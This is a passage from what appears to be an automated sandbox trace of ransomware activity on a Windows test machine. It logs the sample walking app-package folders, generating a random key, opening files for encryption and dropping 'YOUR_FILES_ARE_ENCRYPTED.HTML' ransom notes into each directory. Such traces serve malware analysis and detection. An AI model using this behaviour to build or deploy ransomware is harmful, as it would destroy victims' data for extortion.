wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Settings") returned 92 [0115.681] GetProcessHeap () returned 0x600000 [0115.681] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.681] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Settings" [0115.681] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Settings\\*" [0115.681] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1325e11e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1d30080b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1d30080b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f2a0, dwReserved1=0x62f1f8, cFileName=".", cAlternateFileName="")) returned 0x626638 [0115.681] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1325e11e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1d30080b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1d30080b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f2a0, dwReserved1=0x62f1f8, cFileName="..", cAlternateFileName="")) returned 1 [0115.681] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1344e05e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1344e05e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1344e05e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f2a0, dwReserved1=0x62f1f8, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0115.681] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.681] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Settings\\roaming.lock") returned 105 [0115.681] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0115.681] lstrlenW (lpString=".lock") returned 5 [0115.681] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0115.681] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1331ced9, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x67da06ca, ftLastAccessTime.dwHighDateTime=0x1d70a81, ftLastWriteTime.dwLowDateTime=0x67da06ca, ftLastWriteTime.dwHighDateTime=0x1d70a81, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x62f2a0, dwReserved1=0x62f1f8, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0115.681] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.681] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Settings\\settings.dat") returned 105 [0115.681] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0115.681] lstrlenW (lpString=".dat") returned 4 [0115.681] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0115.681] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0115.681] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.commsphone_8wekyb3d8bbwe\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x32c [0115.682] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0115.682] GetProcessHeap () returned 0x600000 [0115.682] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0115.684] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="A5") returned 2 [0115.685] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="EE") returned 2 [0115.685] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="B9") returned 2 [0115.685] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="1C") returned 2 [0115.685] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="28") returned 2 [0115.685] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="68") returned 2 [0115.685] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="34") returned 2 [0115.685] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="2C") returned 2 [0115.685] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="25") returned 2 [0115.685] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="49") returned 2 [0115.685] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="FD") returned 2 [0115.685] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="C6") returned 2 [0115.685] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="17") returned 2 [0115.685] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="41") returned 2 [0115.685] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="35") returned 2 [0115.685] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="9B") returned 2 [0115.685] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="D2") returned 2 [0115.685] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="B0") returned 2 [0115.685] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="28") returned 2 [0115.685] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="6A") returned 2 [0115.685] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="0F") returned 2 [0115.685] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="CD") returned 2 [0115.685] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="6E") returned 2 [0115.685] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="29") returned 2 [0115.685] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="3B") returned 2 [0115.685] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="8C") returned 2 [0115.685] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="8A") returned 2 [0115.685] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="CA") returned 2 [0115.685] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="3D") returned 2 [0115.685] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="CA") returned 2 [0115.685] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="FF") returned 2 [0115.685] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="58") returned 2 [0115.686] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Settings\\settings.dat" [0115.686] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0115.686] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0115.686] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1d30080b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1d30080b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1d30080b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x62f2a0, dwReserved1=0x62f1f8, cFileName="settings.dat.LOG1", cAlternateFileName="SETTIN~1.LOG")) returned 1 [0115.686] StrStrIW (lpFirst="settings.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.686] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Settings\\settings.dat.LOG1") returned 110 [0115.686] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0115.686] lstrlenW (lpString=".LOG1") returned 5 [0115.686] PathFindExtensionW (pszPath="settings.dat.LOG1") returned=".LOG1" [0115.686] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1d30080b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1d30080b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1d30080b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f2a0, dwReserved1=0x62f1f8, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 1 [0115.686] StrStrIW (lpFirst="settings.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.686] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Settings\\settings.dat.LOG2") returned 110 [0115.686] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0115.686] lstrlenW (lpString=".LOG2") returned 5 [0115.686] PathFindExtensionW (pszPath="settings.dat.LOG2") returned=".LOG2" [0115.686] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x1d30080b, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1d30080b, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1d30080b, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f2a0, dwReserved1=0x62f1f8, cFileName="settings.dat.LOG2", cAlternateFileName="SETTIN~2.LOG")) returned 0 [0115.686] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0115.687] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0115.687] GetProcessHeap () returned 0x600000 [0115.687] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.687] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.commsphone_8wekyb3d8bbwe\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0115.687] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.688] CloseHandle (hObject=0x214) returned 1 [0115.688] GetProcessHeap () returned 0x600000 [0115.688] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.688] GetProcessHeap () returned 0x600000 [0115.688] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.688] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1325e11e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1325e11e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1325e11e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="SystemAppData", cAlternateFileName="SYSTEM~1")) returned 1 [0115.689] StrStrIW (lpFirst="SystemAppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.689] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\SystemAppData") returned 97 [0115.689] GetProcessHeap () returned 0x600000 [0115.689] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.689] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\SystemAppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\SystemAppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\SystemAppData" [0115.689] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\SystemAppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\SystemAppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\SystemAppData\\*" [0115.689] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\SystemAppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1325e11e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1325e11e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1325e11e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f2a0, dwReserved1=0x62f1f8, cFileName=".", cAlternateFileName="")) returned 0x626978 [0115.689] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1325e11e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1325e11e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1325e11e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f2a0, dwReserved1=0x62f1f8, cFileName="..", cAlternateFileName="")) returned 1 [0115.689] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1325e11e, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x1325e11e, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x1325e11e, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f2a0, dwReserved1=0x62f1f8, cFileName="..", cAlternateFileName="")) returned 0 [0115.689] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0115.689] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0115.689] GetProcessHeap () returned 0x600000 [0115.689] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.690] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\SystemAppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.commsphone_8wekyb3d8bbwe\\systemappdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0115.690] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.691] CloseHandle (hObject=0x214) returned 1 [0115.692] GetProcessHeap () returned 0x600000 [0115.692] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.692] GetProcessHeap () returned 0x600000 [0115.692] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.692] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x131531fb, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x131531fb, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x131531fb, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 1 [0115.692] StrStrIW (lpFirst="TempState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.692] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\TempState") returned 93 [0115.692] GetProcessHeap () returned 0x600000 [0115.692] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.692] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\TempState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\TempState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\TempState" [0115.692] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\TempState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\TempState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\TempState\\*" [0115.692] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\TempState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x131531fb, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x131531fb, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x131531fb, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f2a0, dwReserved1=0x62f1f8, cFileName=".", cAlternateFileName="")) returned 0x626978 [0115.692] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x131531fb, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x131531fb, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x131531fb, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f2a0, dwReserved1=0x62f1f8, cFileName="..", cAlternateFileName="")) returned 1 [0115.692] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x131531fb, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x131531fb, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x131531fb, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f2a0, dwReserved1=0x62f1f8, cFileName="..", cAlternateFileName="")) returned 0 [0115.692] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0115.693] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 123 [0115.693] GetProcessHeap () returned 0x600000 [0115.693] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.693] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\TempState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.commsphone_8wekyb3d8bbwe\\tempstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0115.693] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.694] CloseHandle (hObject=0x214) returned 1 [0115.694] GetProcessHeap () returned 0x600000 [0115.694] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.694] GetProcessHeap () returned 0x600000 [0115.694] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.695] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x131531fb, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x131531fb, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x131531fb, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="TempState", cAlternateFileName="TEMPST~1")) returned 0 [0115.695] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0115.695] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0115.695] GetProcessHeap () returned 0x600000 [0115.695] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.696] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.CommsPhone_8wekyb3d8bbwe\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.commsphone_8wekyb3d8bbwe\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0115.696] WriteFile (in: hFile=0x320, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e7a4, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e7a4*=0x3c00, lpOverlapped=0x0) returned 